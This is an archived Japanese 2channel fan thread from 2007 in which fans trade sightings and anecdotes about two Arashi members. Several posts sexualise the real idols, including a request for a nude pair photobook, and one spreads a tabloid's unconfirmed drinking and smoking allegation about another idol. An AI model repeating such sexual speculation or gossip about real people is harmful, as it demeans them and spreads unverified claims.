(*´Д`)ハァハア

430 :ななしじゃにー:2007/01/21(日) 00:13:28 ID:xHApB2Go
おまいらが虹に落ちたきっかけを聞きたい
漏れはピンアラの傘君はあげない発言で落ちたが
秘密探偵の頃からの虹担がいたら流石に凄いがw

431 :ななしじゃにー:2007/01/21(日) 00:18:11 ID:8eo8+06d
>秘密探偵の頃からの虹担

ノシ

432 :ななしじゃにー:2007/01/21(日) 02:15:22 ID:03EZpJO7
>431に続いてノシ

433 :ななしじゃにー:2007/01/21(日) 12:00:55 ID:Ght7v9lD
ノシ

434 :ななしじゃにー:2007/01/21(日) 13:56:44 ID:8TH2ots3
スゴスw
自分は虹氷河期の頃に本格的にあらち落ちしたんで、
最初は単純にビズ組み合わせだけでなんとなくスチだった。
んで、なんでこんな虹ってぎこちないんだろうと不思議に思ってるうち、
過去の虹の姿をいろいろと知って、その落差にじわじわ落ちた。
なので具体的なきっかけがナイ。

435 :ななしじゃにー:2007/01/21(日) 20:21:06 ID:RdMFbThS
そういうこともありだな

436 :ななしじゃにー:2007/01/22(月) 13:18:20 ID:Hiy4RIiG
ハム造サイトの話に傘の名前だけ無い件

437 :ななしじゃにー:2007/01/22(月) 14:34:54 ID:jKhPn7l1
実際、鳴るともでも傘の名前だけ出してない罠。
その反対もよくある事さ。

438 :ななしじゃにー:2007/01/22(月) 22:15:03 ID:M+aAM6TA
虹氷河期…ワカンネ。
いつの話だyo

439 :ななしじゃにー:2007/01/23(火) 00:30:50 ID:M/XbiDk5
フォアグラ仲良し(*´Д`)

440 :ななしじゃにー:2007/01/23(火) 00:44:37 ID:O5Gq8Qg5
「大きいのとタレがいっぱい付いたのどっちがいい?」(*´Д`)

441 :ななしじゃにー:2007/01/23(火) 00:49:28 ID:DdNEvUkI
どっちどっちどっちイキタイ?
どっちでもいいよ
こっちはデカくてこっちはタレが多いよ
ん〜タレが多いほうがいいなあ


やらしいなあ(*´д`)なんだか

442 :ななしじゃにー:2007/01/23(火) 01:08:05 ID:ZB3JgIDB
>441
きもい
市ね

443 :ななしじゃにー:2007/01/23(火) 01:29:22 ID:zTWZ3Nkz
目隠ししてあげようとする弟歪(´Д`*)ハフン

444 :ななしじゃにー:2007/01/23(火) 01:32:38 ID:YM01qDzI
そして自分のために痛い思いして欲しくないから大丈夫という兄傘(´Д`*)ハフン

445 :ななしじゃにー:2007/01/23(火) 01:45:06 ID:9A3kr/am
傘の目隠してあげようとする歪(*´Д`)ハァハァ
痛い思いしないように自分でやると言う傘(*´Д`)ハァハァ

フォアグラ、「どっちがいーい?」「どっちでもいいよ」
「こっちはデカくてこっちはタレが多いよ」「ん〜タレが多いほうがいいなぁ」
(*´Д`)ハァハァハァハァハァハァ

446 :ななしじゃにー:2007/01/23(火) 07:48:53 ID:a+UIxCTA
目隠しで、よらんでざざ虫食わされる時の歪を思い出した。
あん時は傘が目隠ししてやったんだよな…w

447 :ななしじゃにー:2007/01/23(火) 08:06:52 ID:DdNEvUkI
(*´Д`)シコシコシコシコシコシコシコシコシコ

448 :ななしじゃにー:2007/01/23(火) 08:32:07 ID:x8jhYutp
age房くんな

449 :ななしじゃにー:2007/01/23(火) 21:32:34 ID:R7QTGHSl
虹は好きだがこの流れはキモイわけで

450 :ななしじゃにー:2007/01/23(火) 23:08:02 ID:dTcyxXEe
>446
なつかしー。
優しげに目隠しする手を思い出したっす。

451 :ななしじゃにー:2007/01/24(水) 13:04:10 ID:vieok/rm
保守

452 :ななしじゃにー:2007/01/24(水) 17:01:39 ID:GTgv3U8d
>>449
早く神楽坂に帰りなさい。

453 :ななしじゃにー:2007/01/26(金) 00:18:51 ID:N3BmnCxj
歪、今も傘にマジプレゼントとかしてんのかな
昔はブランドものをやったとか貰ったとか都市伝説みたいなのがあったが
虹間のやり取りは一生この二人にしか分かんないんだろな
かたくなに喋んないからなあw

454 :ななしじゃにー:2007/01/26(金) 00:51:52 ID:W+7VldKs
そお?iーpodのスピーカーは
かたくなに喋んない結果なん?

455 :ななしじゃにー:2007/01/26(金) 11:17:37 ID:r+DJsDXe
>453
都市伝説でもなんでもないだろ。事実だ。
予算が決まってんのに、似合いそうだからとブランドものを買う傘。

456 :ななしじゃにー:2007/01/26(金) 11:52:36 ID:Km4YaBL+
「予算オーバーだったけど歪に似合うと思って」買った
プ●ダスポーツのリュック。テラナツカシスw

457 :ななしじゃにー:2007/01/26(金) 17:44:09 ID:0P20Ha2F
二十歳の誕生日にわざわざ歪の生まれ年のワインを買う傘w
なんだよ、そのチョイスはw

458 :ななしじゃにー:2007/01/26(金) 23:35:15 ID:UdKQWe9/
ここでひとつ

虫 工 になれー!

歌番組でツーショで歌ってるカットみたいなぁ。
2番だから歌わないだろうけど。

459 :ななしじゃにー:2007/01/26(金) 23:53:16 ID:ljDTnrF9
こんな事聞くと神楽坂からまた抜け出してくるかな・・
去年初めて歪生誕紺?を体験したんだけどさ。
プレゼントを渡す時あちこちで「ヒューヒュー」って言ってたから
自分も「ヒューヒュー」言ったんだけど、いつもああなの?
他面生誕の時(っても限られるが)もそんなもん?

460 :ななしじゃにー:2007/01/27(土) 01:08:58 ID:/gpiPWKF
去年の傘→歪プレゼントの空気はかなり異質だったよねw
歪も後退りするしw 他面の名前だすと荒れるからやめよう。
見たままだよ、あれw

461 :ななしじゃにー:2007/01/27(土) 01:19:39 ID:VSwBef0O
「なぜ後退りするんだ、なぜ怯える」と疑問に思ったんだが
傘のプレゼントに怯えたわけではなかったんだw
そうかぁ、あの空気が異質だったんか。教えてくれて、とん。
ノリで「ヒューヒュー」言ったらいかんのだねw

462 :ななしじゃにー:2007/01/27(土) 02:19:09 ID:qq4Ky8C/
(゚Д゚)

463 :ななしじゃにー:2007/01/27(土) 23:08:19 ID:NTIJPS/u
バンビとバンビ (*´Д`)

464 :ななしじゃにー:2007/01/27(土) 23:25:45 ID:VSwBef0O
みどり色はきらいじゃ

465 :ななしじゃにー:2007/01/27(土) 23:58:48 ID:IYlIvBHZ
(*^-^)b

466 :ななしじゃにー:2007/01/28(日) 00:00:04 ID:VkVQUrv6
いつもの?

467 :ななしじゃにー:2007/01/28(日) 01:05:28 ID:7zsDAsdy
Wバンビおめ!

468 :ななしじゃにー:2007/01/28(日) 08:02:49 ID:SyHmg6Nz
Wバンビめでたい!ユニット結成してホスイw

469 :ななしじゃにー:2007/01/28(日) 17:03:23 ID:6qpWppfw
歪バンビ大好きだもんなw良かったな

470 :ななしじゃにー:2007/01/28(日) 17:57:58 ID:wjAT3/zn
ここってお姉様いるの?

471 :ななしじゃにー:2007/01/28(日) 18:58:29 ID:OhsWHDjL
いるノシ
バンビとられたとか思ってないから安心汁

472 :ななしじゃにー:2007/01/28(日) 19:49:08 ID:ngxNHyxv
>468
ユニットと言えば、松井はいつ披露してくれるんだろう?

473 :ななしじゃにー:2007/01/28(日) 22:13:01 ID:KmbAbAia
昨日の孫EDで傘が言ったことにたいして歪が付け足し傘が訂正しながらはなすのがたまらない

474 :ななしじゃにー:2007/01/28(日) 23:24:42 ID:1PJi/9In
kwsk

475 :ななしじゃにー:2007/01/31(水) 11:57:02 ID:yvla5viU
>460>461
あの空気はかなり異質だったな、本当にw
他面の時は普通だったのに、傘→歪プレゼントになった途端あちこちで「ヒューヒュー」の嵐w
歪も後退りするから余計生々しい光景になってた。

あと、エンドリライブ2人で一緒に行ったってマジ?

476 :ななしじゃにー:2007/01/31(水) 13:50:35 ID:VRvcrpqG
>475
平安歪で見てて、遅れて傘が来た

477 :ななしじゃにー:2007/01/31(水) 14:30:28 ID:55pRKH9b
>476
kwsk!!

478 :ななしじゃにー:2007/01/31(水) 19:41:32 ID:6XfS+kD3
本日(1月31日)発売のブブカに手越の飲酒喫煙疑惑が載ったらしい。
NEWSは山下が喫煙をフライデーに撮られ、森内が喫煙で脱退。
内が飲酒で脱退。草野が飲酒で脱退。そして今度の手越と不祥事続き。

事務所全体のイメージを悪くし、鴇武威近畿あらち滝つと全ての事務所
所属タレントに大ダメージを与えたNEWSは今すぐ解散すべきだ。

NEWSには加藤と手越と未成年がまだ2人おり、今までの流れからして
成人するまで逃げ切れると思えない。


479 :ななしじゃにー:2007/02/03(土) 14:22:29 ID:+xsJA7PD
傘が歪の子を妊娠する夢をみてしまった。

480 :ななしじゃにー:2007/02/03(土) 15:56:14 ID:wjyGFlco
●同人系の話・妄想は『絶対禁止』現実にあった事『のみ』話題として可

481 :ななしじゃにー:2007/02/03(土) 15:58:45 ID:OC9UtZIi
このスレを見ている人はこんなスレも見ています。
櫻井翔の噂34 [噂話]
櫻井翔の噂35 [噂話]
松潤二百二十九 [噂話]
松潤二百四十一 [噂話]
JEFサポに問うPart235 [国内サッカー]


482 :ななしじゃにー:2007/02/03(土) 19:21:55 ID:KkpzxxZA
最後ワロタw

483 :ななしじゃにー:2007/02/06(火) 00:54:47 ID:8cjQnh+A
傘が選んだ川柳に
歪の名前一文字があったことに
ホッコリ

484 :ななしじゃにー:2007/02/06(火) 00:58:14 ID:765c+HNT
>483
細かすぎてワロスw
自分もそうだが沸点低いよなw

485 :ななしじゃにー:2007/02/06(火) 23:32:28 ID:0U9a0jef
誰も書かないので。
今日のいいともに贈られた花、
二人の名前がでっかく並んでいたな、
ただそれだけだがw

486 :ななしじゃにー:2007/02/07(水) 08:12:00 ID:GsWo3Rs9
虹のペアヌード写真集出してほしいな。

487 :ななしじゃにー:2007/02/07(水) 11:17:03 ID:JAAI3+B+
>485
知らなかった・・・
一緒の花?それともそれぞれ?

にしても・・・昔は歪キャラが傘だったのにな・・・

488 :ななしじゃにー:2007/02/07(水) 17:28:48 ID:6LlpU8U4
ペアヌード
絡み合いつきで(*´д`)

489 :ななしじゃにー:2007/02/07(水) 18:08:07 ID:TD11HFcs
このスレきめえ

490 :ななしじゃにー:2007/02/07(水) 19:49:22 ID:37YdSJEZ
>487
485姐さんではないが。
それぞれ贈ってた。
歪傘の並びで同じぐらいの大きさの花ダタ。

491 :ななしじゃにー:2007/02/07(水) 23:46:55 ID:bfDUIi4l
「きめえ」のは同意だが、このスレに何の御用?

492 :ななしじゃにー:2007/02/07(水) 23:57:01 ID:tttcxPlv
クローバー探したりシロツメクサ摘んだり
世界がまぶしかったり美しかったりした

493 :ななしじゃにー:2007/02/08(木) 16:21:48 ID:yMTBYbO1
>492
それなんて純愛ムービー?

494 :ななしじゃにー:2007/02/08(木) 22:49:58 ID:dC3NBfWT
>492
それなんて僕はハチミツに恋をする?

495 :ななしじゃにー:2007/02/09(金) 01:18:41 ID:0Le+j0lQ
潤相ムービーならいいよ

496 :ななしじゃにー:2007/02/09(金) 07:56:41 ID:fhb3woF6
>494
それなんて熊の○゚ーさん?

497 :ななしじゃにー:2007/02/09(金) 11:45:18 ID:Cne7iTQP
>491
スレが上がってて目に付いたんだろw
ヌルー汁

498 :ななしじゃにー:2007/02/10(土) 09:50:23 ID:gO4bxZWz
>>483
亀レスだがその川柳ってどこでやったもの?
気になってしょうがない。

499 :ななしじゃにー:2007/02/10(土) 09:56:25 ID:3mKerjq0
>498
483ではないが、
零でサラリーマン川柳の紹介をする際、
キャスターでどれがいいかそれぞれ選んだ。
んで傘が選んだ川柳に歪の名前が入ってた。

500 :ななしじゃにー:2007/02/10(土) 09:59:03 ID:3mKerjq0
思いっきり全角だったorz

501 :ななしじゃにー:2007/02/10(土) 11:53:04 ID:9+47CL8+
二重奏の肩組み、感動した
何ヶ月ぶりだろう

502 :ななしじゃにー:2007/02/10(土) 12:37:28 ID:YhFACbDa
ナンダッテ!今すぐ買う!

503 :ななしじゃにー:2007/02/11(日) 05:17:58 ID:eKNN1Glz
もう、うーあーうーあっあーから5年以上か。

504 :ななしじゃにー:2007/02/12(月) 01:51:20 ID:VUTvuToe
年月がたつのは早いな

505 :ななしじゃにー:2007/02/12(月) 15:35:26 ID:e5UQpylS
今年の夏紺で小鹿コンビで復活キボン

506 :ななしじゃにー:2007/02/13(火) 01:17:28 ID:2E/evlw3
Wバンビでカワ●エエ曲キボン

507 :ななしじゃにー:2007/02/13(火) 13:31:00 ID:5Anfnigh
>>499
亀レスですが、d。
最後すぎて見逃してた。
本当細かいけど、ちょっとニヤけるな。

508 :ななしじゃにー:2007/02/13(火) 23:33:38 ID:pmRfDSxM
 ________
 |  ノノノ ||  .|   / ̄ ̄ ̄ ̄ ̄ ̄
 |( ^∀^)||o | <  たらぃまー?
 | (   つ|| |  \______
   ̄ ̄ ̄ ̄ ̄




509 :ななしじゃにー:2007/02/14(水) 19:45:51 ID:qjqc9C/p
芸能人の秘蔵映像が見れる掲示板!!
↓↓↓ 必見
http://talk.milkcafe.net/test/read.cgi/girlidol/1091148903/785

510 :ななしじゃにー:2007/02/16(金) 00:25:13 ID:YmQBgb0Z
誕生日占いの本によると歪の人生の転機が23歳。
そして傘の人生の転機が25歳。そんなわけで二人とも
同時に転機を迎えています。
当たってたら面白いね。

511 :ななしじゃにー:2007/02/16(金) 00:37:58 ID:zoUI+pbE
…で?って言う

512 :ななしじゃにー:2007/02/16(金) 00:56:38 ID:xduK6TES
サクラ餅はドウミョウジ粉で作るってことかな

513 :ななしじゃにー:2007/02/17(土) 10:32:40 ID:ZnPHkspr
歪、ラジで零ED曲をかけた
「零のテーマ曲です」っていう紹介がなんだか照れた声だた

514 :ななしじゃにー:2007/02/17(土) 20:53:11 ID:LKOqSFEb
へ〜

515 :ななしじゃにー:2007/02/18(日) 12:06:10 ID:0//ZjvgU
花団ナビヨカタよな

516 :ななしじゃにー:2007/02/18(日) 16:21:22 ID:ihlUhhZi
>515
痴呆民にkwsk

517 :ななしじゃにー:2007/02/18(日) 17:13:48 ID:xgp9nYYT
タモステ、歪ソロ前で敢えて歪の方を見ない傘に萌え

518 :ななしじゃにー:2007/02/18(日) 20:18:33 ID:8I7ETZI3
少クラ、新曲虹パートキタ━━━━(゚∀゚)━━━━ !!!!!。
凱旋見に行けなかったので、ようやく見れたよ。
ほのぼのした。

519 :ななしじゃにー:2007/02/18(日) 20:42:10 ID:kzOqFMM2
2番か?

520 :ななしじゃにー:2007/02/18(日) 23:35:07 ID:PNbZe7Fi
うそー!
唯のVTRコメかと思って見なかったのに・・・・orz

521 :ななしじゃにー:2007/02/19(月) 00:13:17 ID:sVNbqGpg
きたこれ

522 :ななしじゃにー:2007/02/21(水) 09:42:24 ID:Xo+BHJYe
ちょシークレットトークの虹破壊力スゴス(*´Д`)

523 :ななしじゃにー:2007/02/21(水) 23:24:39 ID:/OIXsDK3
マツモトサトシ(*´д`)

524 :ななしじゃにー:2007/02/22(木) 00:13:19 ID:5VP2ElNX
イソドの話にならなくて残念でした。

525 :ななしじゃにー:2007/02/22(木) 21:23:29 ID:xstNApzw
餡餡ネタ振ってくれたアニキGJ!

95 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)